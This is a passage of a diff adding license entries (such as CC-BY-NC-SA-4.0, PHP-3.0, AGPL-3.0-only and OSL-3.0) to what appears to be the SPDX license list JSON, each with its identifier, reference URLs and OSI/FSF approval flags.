+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-4.0.json",
+      "referenceNumber": 159,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 4.0 International",
+      "licenseId": "CC-BY-NC-SA-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/HaskellReport.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/HaskellReport.json",
+      "referenceNumber": 160,
+      "name": "Haskell Language Report License",
+      "licenseId": "HaskellReport",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Haskell_Language_Report_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-1.0.json",
+      "referenceNumber": 161,
+      "name": "Creative Commons Attribution 1.0 Generic",
+      "licenseId": "CC-BY-1.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/1.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/UCL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/UCL-1.0.json",
+      "referenceNumber": 162,
+      "name": "Upstream Compatibility License v1.0",
+      "licenseId": "UCL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/UCL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Mup.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Mup.json",
+      "referenceNumber": 163,
+      "name": "Mup License",
+      "licenseId": "Mup",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Mup"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SMPPL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SMPPL.json",
+      "referenceNumber": 164,
+      "name": "Secure Messaging Protocol Public License",
+      "licenseId": "SMPPL",
+      "seeAlso": [
+        "https://github.com/dcblake/SMP/blob/master/Documentation/License.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/PHP-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/PHP-3.0.json",
+      "referenceNumber": 165,
+      "name": "PHP License v3.0",
+      "licenseId": "PHP-3.0",
+      "seeAlso": [
+        "http://www.php.net/license/3_0.txt",
+        "https://opensource.org/licenses/PHP-3.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GL2PS.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GL2PS.json",
+      "referenceNumber": 166,
+      "name": "GL2PS License",
+      "licenseId": "GL2PS",
+      "seeAlso": [
+        "http://www.geuz.org/gl2ps/COPYING.GL2PS"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CrystalStacker.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CrystalStacker.json",
+      "referenceNumber": 167,
+      "name": "CrystalStacker License",
+      "licenseId": "CrystalStacker",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing:CrystalStacker?rd\u003dLicensing/CrystalStacker"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/W3C-20150513.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/W3C-20150513.json",
+      "referenceNumber": 168,
+      "name": "W3C Software Notice and Document License (2015-05-13)",
+      "licenseId": "W3C-20150513",
+      "seeAlso": [
+        "https://www.w3.org/Consortium/Legal/2015/copyright-software-and-document"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NIST-PD-fallback.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NIST-PD-fallback.json",
+      "referenceNumber": 169,
+      "name": "NIST Public Domain Notice with license fallback",
+      "licenseId": "NIST-PD-fallback",
+      "seeAlso": [
+        "https://github.com/usnistgov/jsip/blob/59700e6926cbe96c5cdae897d9a7d2656b42abe3/LICENSE",
+        "https://github.com/usnistgov/fipy/blob/86aaa5c2ba2c6f1be19593c5986071cf6568cc34/LICENSE.rst"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OGL-UK-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OGL-UK-1.0.json",
+      "referenceNumber": 170,
+      "name": "Open Government Licence v1.0",
+      "licenseId": "OGL-UK-1.0",
+      "seeAlso": [
+        "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/1/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CPL-1.0.json",
+      "referenceNumber": 171,
+      "name": "Common Public License 1.0",
+      "licenseId": "CPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/CPL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.1-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.1-only.json",
+      "referenceNumber": 172,
+      "name": "GNU Lesser General Public License v2.1 only",
+      "licenseId": "LGPL-2.1-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+        "https://opensource.org/licenses/LGPL-2.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ZPL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ZPL-2.0.json",
+      "referenceNumber": 173,
+      "name": "Zope Public License 2.0",
+      "licenseId": "ZPL-2.0",
+      "seeAlso": [
+        "http://old.zope.org/Resources/License/ZPL-2.0",
+        "https://opensource.org/licenses/ZPL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Frameworx-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Frameworx-1.0.json",
+      "referenceNumber": 174,
+      "name": "Frameworx Open License 1.0",
+      "licenseId": "Frameworx-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/Frameworx-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/AGPL-3.0-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-only.json",
+      "referenceNumber": 175,
+      "name": "GNU Affero General Public License v3.0 only",
+      "licenseId": "AGPL-3.0-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/agpl.txt",
+        "https://opensource.org/licenses/AGPL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/DRL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/DRL-1.0.json",
+      "referenceNumber": 176,
+      "name": "Detection Rule License 1.0",
+      "licenseId": "DRL-1.0",
+      "seeAlso": [
+        "https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EFL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EFL-2.0.json",
+      "referenceNumber": 177,
+      "name": "Eiffel Forum License v2.0",
+      "licenseId": "EFL-2.0",
+      "seeAlso": [
+        "http://www.eiffel-nice.org/license/eiffel-forum-license-2.html",
+        "https://opensource.org/licenses/EFL-2.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Spencer-99.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Spencer-99.json",
+      "referenceNumber": 178,
+      "name": "Spencer License 99",
+      "licenseId": "Spencer-99",
+      "seeAlso": [
+        "http://www.opensource.apple.com/source/tcl/tcl-5/tcl/generic/regfronts.c"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CAL-1.0-Combined-Work-Exception.json",
+      "referenceNumber": 179,
+      "name": "Cryptographic Autonomy License 1.0 (Combined Work Exception)",
+      "licenseId": "CAL-1.0-Combined-Work-Exception",
+      "seeAlso": [
+        "http://cryptographicautonomylicense.com/license-text.html",
+        "https://opensource.org/licenses/CAL-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-invariants-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-invariants-only.json",
+      "referenceNumber": 180,
+      "name": "GNU Free Documentation License v1.1 only - invariants",
+      "licenseId": "GFDL-1.1-invariants-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/TCL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/TCL.json",
+      "referenceNumber": 181,
+      "name": "TCL/TK License",
+      "licenseId": "TCL",
+      "seeAlso": [
+        "http://www.tcl.tk/software/tcltk/license.html",
+        "https://fedoraproject.org/wiki/Licensing/TCL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SHL-0.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SHL-0.5.json",
+      "referenceNumber": 182,
+      "name": "Solderpad Hardware License v0.5",
+      "licenseId": "SHL-0.5",
+      "seeAlso": [
+        "https://solderpad.org/licenses/SHL-0.5/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OFL-1.0-RFN.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OFL-1.0-RFN.json",
+      "referenceNumber": 183,
+      "name": "SIL Open Font License 1.0 with Reserved Font Name",
+      "licenseId": "OFL-1.0-RFN",
+      "seeAlso": [
+        "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/LGPL-2.0.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/LGPL-2.0.json",
+      "referenceNumber": 184,
+      "name": "GNU Library General Public License v2 only",
+      "licenseId": "LGPL-2.0",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CERN-OHL-W-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CERN-OHL-W-2.0.json",
+      "referenceNumber": 185,
+      "name": "CERN Open Hardware Licence Version 2 - Weakly Reciprocal",
+      "licenseId": "CERN-OHL-W-2.0",
+      "seeAlso": [
+        "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Glide.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Glide.json",
+      "referenceNumber": 186,
+      "name": "3dfx Glide License",
+      "licenseId": "Glide",
+      "seeAlso": [
+        "http://www.users.on.net/~triforce/glidexp/COPYING.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/mpich2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/mpich2.json",
+      "referenceNumber": 187,
+      "name": "mpich2 License",
+      "licenseId": "mpich2",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MIT"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/psutils.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/psutils.json",
+      "referenceNumber": 188,
+      "name": "psutils License",
+      "licenseId": "psutils",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/psutils"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SPL-1.0.json",
+      "referenceNumber": 189,
+      "name": "Sun Public License v1.0",
+      "licenseId": "SPL-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/SPL-1.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Apache-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Apache-1.1.json",
+      "referenceNumber": 190,
+      "name": "Apache License 1.1",
+      "licenseId": "Apache-1.1",
+      "seeAlso": [
+        "http://apache.org/licenses/LICENSE-1.1",
+        "https://opensource.org/licenses/Apache-1.1"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-ND-4.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-4.0.json",
+      "referenceNumber": 191,
+      "name": "Creative Commons Attribution No Derivatives 4.0 International",
+      "licenseId": "CC-BY-ND-4.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nd/4.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/FreeBSD-DOC.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/FreeBSD-DOC.json",
+      "referenceNumber": 192,
+      "name": "FreeBSD Documentation License",
+      "licenseId": "FreeBSD-DOC",
+      "seeAlso": [
+        "https://www.freebsd.org/copyright/freebsd-doc-license/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SCEA.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SCEA.json",
+      "referenceNumber": 193,
+      "name": "SCEA Shared Source License",
+      "licenseId": "SCEA",
+      "seeAlso": [
+        "http://research.scea.com/scea_shared_source_license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Latex2e.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Latex2e.json",
+      "referenceNumber": 194,
+      "name": "Latex2e License",
+      "licenseId": "Latex2e",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Latex2e"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Artistic-1.0-cl8.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-cl8.json",
+      "referenceNumber": 195,
+      "name": "Artistic License 1.0 w/clause 8",
+      "licenseId": "Artistic-1.0-cl8",
+      "seeAlso": [
+        "https://opensource.org/licenses/Artistic-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/SGI-B-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SGI-B-1.1.json",
+      "referenceNumber": 196,
+      "name": "SGI Free Software License B v1.1",
+      "licenseId": "SGI-B-1.1",
+      "seeAlso": [
+        "http://oss.sgi.com/projects/FreeB/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/NRL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NRL.json",
+      "referenceNumber": 197,
+      "name": "NRL License",
+      "licenseId": "NRL",
+      "seeAlso": [
+        "http://web.mit.edu/network/isakmp/nrllicense.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SWL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SWL.json",
+      "referenceNumber": 198,
+      "name": "Scheme Widget Library (SWL) Software License Agreement",
+      "licenseId": "SWL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/SWL"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Zed.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Zed.json",
+      "referenceNumber": 199,
+      "name": "Zed License",
+      "licenseId": "Zed",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Zed"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CERN-OHL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CERN-OHL-1.1.json",
+      "referenceNumber": 200,
+      "name": "CERN Open Hardware Licence v1.1",
+      "licenseId": "CERN-OHL-1.1",
+      "seeAlso": [
+        "https://www.ohwr.org/project/licenses/wikis/cern-ohl-v1.1"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/RHeCos-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/RHeCos-1.1.json",
+      "referenceNumber": 201,
+      "name": "Red Hat eCos Public License v1.1",
+      "licenseId": "RHeCos-1.1",
+      "seeAlso": [
+        "http://ecos.sourceware.org/old-license.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/JasPer-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/JasPer-2.0.json",
+      "referenceNumber": 202,
+      "name": "JasPer License",
+      "licenseId": "JasPer-2.0",
+      "seeAlso": [
+        "http://www.ece.uvic.ca/~mdadams/jasper/LICENSE"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/SSPL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/SSPL-1.0.json",
+      "referenceNumber": 203,
+      "name": "Server Side Public License, v 1",
+      "licenseId": "SSPL-1.0",
+      "seeAlso": [
+        "https://www.mongodb.com/licensing/server-side-public-license"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GPL-2.0+.html",
+      "isDeprecatedLicenseId": true,
+      "detailsUrl": "https://spdx.org/licenses/GPL-2.0+.json",
+      "referenceNumber": 204,
+      "name": "GNU General Public License v2.0 or later",
+      "licenseId": "GPL-2.0+",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
+        "https://opensource.org/licenses/GPL-2.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-1.4.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-1.4.json",
+      "referenceNumber": 205,
+      "name": "Open LDAP Public License v1.4",
+      "licenseId": "OLDAP-1.4",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dc9f95c2f3f2ffb5e0ae55fe7388af75547660941"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/libpng-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/libpng-2.0.json",
+      "referenceNumber": 206,
+      "name": "PNG Reference Library version 2",
+      "licenseId": "libpng-2.0",
+      "seeAlso": [
+        "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CNRI-Python-GPL-Compatible.json",
+      "referenceNumber": 207,
+      "name": "CNRI Python Open Source GPL Compatible License Agreement",
+      "licenseId": "CNRI-Python-GPL-Compatible",
+      "seeAlso": [
+        "http://www.python.org/download/releases/1.6.1/download_win/"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Aladdin.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Aladdin.json",
+      "referenceNumber": 208,
+      "name": "Aladdin Free Public License",
+      "licenseId": "Aladdin",
+      "seeAlso": [
+        "http://pages.cs.wisc.edu/~ghost/doc/AFPL/6.01/Public.htm"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-1.0.json",
+      "referenceNumber": 209,
+      "name": "CeCILL Free Software License Agreement v1.0",
+      "licenseId": "CECILL-1.0",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL_V1-fr.html"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Ruby.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Ruby.json",
+      "referenceNumber": 210,
+      "name": "Ruby License",
+      "licenseId": "Ruby",
+      "seeAlso": [
+        "http://www.ruby-lang.org/en/LICENSE.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/NPL-1.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/NPL-1.1.json",
+      "referenceNumber": 211,
+      "name": "Netscape Public License v1.1",
+      "licenseId": "NPL-1.1",
+      "seeAlso": [
+        "http://www.mozilla.org/MPL/NPL/1.1/"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/ImageMagick.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/ImageMagick.json",
+      "referenceNumber": 212,
+      "name": "ImageMagick License",
+      "licenseId": "ImageMagick",
+      "seeAlso": [
+        "http://www.imagemagick.org/script/license.php"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Cube.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Cube.json",
+      "referenceNumber": 213,
+      "name": "Cube License",
+      "licenseId": "Cube",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Cube"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.1-only.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-only.json",
+      "referenceNumber": 214,
+      "name": "GNU Free Documentation License v1.1 only",
+      "licenseId": "GFDL-1.1-only",
+      "seeAlso": [
+        "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-2.0.json",
+      "referenceNumber": 215,
+      "name": "Creative Commons Attribution 2.0 Generic",
+      "licenseId": "CC-BY-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/AFL-1.2.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/AFL-1.2.json",
+      "referenceNumber": 216,
+      "name": "Academic Free License v1.2",
+      "licenseId": "AFL-1.2",
+      "seeAlso": [
+        "http://opensource.linux-mirror.org/licenses/afl-1.2.txt",
+        "http://wayback.archive.org/web/20021204204652/http://www.opensource.org/licenses/academic.php"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-SA-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0.json",
+      "referenceNumber": 217,
+      "name": "Creative Commons Attribution Share Alike 2.0 Generic",
+      "licenseId": "CC-BY-SA-2.0",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-sa/2.0/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CECILL-2.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CECILL-2.0.json",
+      "referenceNumber": 218,
+      "name": "CeCILL Free Software License Agreement v2.0",
+      "licenseId": "CECILL-2.0",
+      "seeAlso": [
+        "http://www.cecill.info/licences/Licence_CeCILL_V2-en.html"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MIT-advertising.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MIT-advertising.json",
+      "referenceNumber": 219,
+      "name": "Enlightenment License (e16)",
+      "licenseId": "MIT-advertising",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/MIT_With_Advertising"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.5.json",
+      "referenceNumber": 220,
+      "name": "Creative Commons Attribution Non Commercial Share Alike 2.5 Generic",
+      "licenseId": "CC-BY-NC-SA-2.5",
+      "seeAlso": [
+        "https://creativecommons.org/licenses/by-nc-sa/2.5/legalcode"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/Artistic-1.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Artistic-1.0.json",
+      "referenceNumber": 221,
+      "name": "Artistic License 1.0",
+      "licenseId": "Artistic-1.0",
+      "seeAlso": [
+        "https://opensource.org/licenses/Artistic-1.0"
+      ],
+      "isOsiApproved": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/OSL-3.0.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OSL-3.0.json",
+      "referenceNumber": 222,
+      "name": "Open Software License 3.0",
+      "licenseId": "OSL-3.0",
+      "seeAlso": [
+        "https://web.archive.org/web/20120101081418/http://rosenlaw.com:80/OSL3.0.htm",
+        "https://opensource.org/licenses/OSL-3.0"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/X11.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/X11.json",
+      "referenceNumber": 223,
+      "name": "X11 License",
+      "licenseId": "X11",
+      "seeAlso": [
+        "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3"
+      ],
+      "isOsiApproved": false,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/Bahyph.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/Bahyph.json",
+      "referenceNumber": 224,
+      "name": "Bahyph License",
+      "licenseId": "Bahyph",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Bahyph"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/OLDAP-2.0.1.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.1.json",
+      "referenceNumber": 225,
+      "name": "Open LDAP Public License v2.0.1",
+      "licenseId": "OLDAP-2.0.1",
+      "seeAlso": [
+        "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003db6d68acd14e51ca3aab4428bf26522aa74873f0e"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/EUDatagrid.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/EUDatagrid.json",
+      "referenceNumber": 226,
+      "name": "EU DataGrid Software License",
+      "licenseId": "EUDatagrid",
+      "seeAlso": [
+        "http://eu-datagrid.web.cern.ch/eu-datagrid/license.html",
+        "https://opensource.org/licenses/EUDatagrid"
+      ],
+      "isOsiApproved": true,
+      "isFsfLibre": true
+    },
+    {
+      "reference": "https://spdx.org/licenses/MTLL.html",
+      "isDeprecatedLicenseId": false,
+      "detailsUrl": "https://spdx.org/licenses/MTLL.json",
+      "referenceNumber": 227,
+      "name": "Matrix Template Library License",
+      "licenseId": "MTLL",
+      "seeAlso": [
+        "https://fedoraproject.org/wiki/Licensing/Matrix_Template_Library_License"
+      ],
+      "isOsiApproved": false
+    },
+    {
+      "reference": "https://spdx.org/licenses/GFDL-1.2-invariants-only.html",
+      "isDeprecatedLicenseId": false,
